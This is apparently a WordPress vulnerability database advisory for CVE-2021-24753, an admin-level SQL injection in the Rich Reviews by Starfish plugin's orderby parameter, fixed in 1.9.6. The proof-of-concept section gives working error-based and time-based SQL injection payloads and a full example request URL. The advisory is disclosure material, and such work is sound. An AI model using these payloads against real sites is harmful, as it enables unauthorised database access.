Rich Reviews by Starfish < 1.9.6 – Admin+ SQL Injection | CVE 2021-24753 | Plugin Vulnerabilities

Description

The plugin does not properly validate the orderby GET parameter of the pending reviews page before using it in a SQL statement, leading to an authenticated SQL injection issue

Proof of Concept

error-based SQLI: orderby=id AND EXTRACTVALUE(4795,CONCAT(0x5c,0x717a627871,(SELECT (ELT(4795=4795,1))),0x7176707071))
time-based blind SQLI: orderby=id AND (SELECT 1339 FROM (SELECT(SLEEP(5)))Ozmh)

https://example.com/wp-admin/admin.php?page=fp_admin_pending_reviews_page&order=asc&orderby=id+AND+%28SELECT+1339+FROM+%28SELECT%28SLEEP%285%29%29%29Ozmh%29

Affects Plugins

Fixed in 1.9.6

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2624882/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID

be7b102f-3982-46bd-a79c-203498f7c820

Timeline

Publicly Published

2021-11-29 (about 4 years ago)

Added

2021-11-29 (about 4 years ago)

Last Updated

2022-04-10 (about 3 years ago)

Other

Published

Title

Published

2023-06-08

Title

Ultimate Addons for Contact Form 7 3.1.23 - Subscriber+ SQLi

Published

2019-05-10

Title

Form Maker by 10Web < 1.13.3 - Authenticated SQL Injection

Published

2024-12-13

Title

WP Job Portal < 2.2.3 - Authenticated (Admin+) SQL Injection via getFieldsForVisibleCombobox()

Published

2025-01-03

Title

ARPrice < 4.2 - Unauthenticated SQL Injection

Published

2023-11-21

Title

Login Lockdown < 2.07 - Administrator+ SQL Injection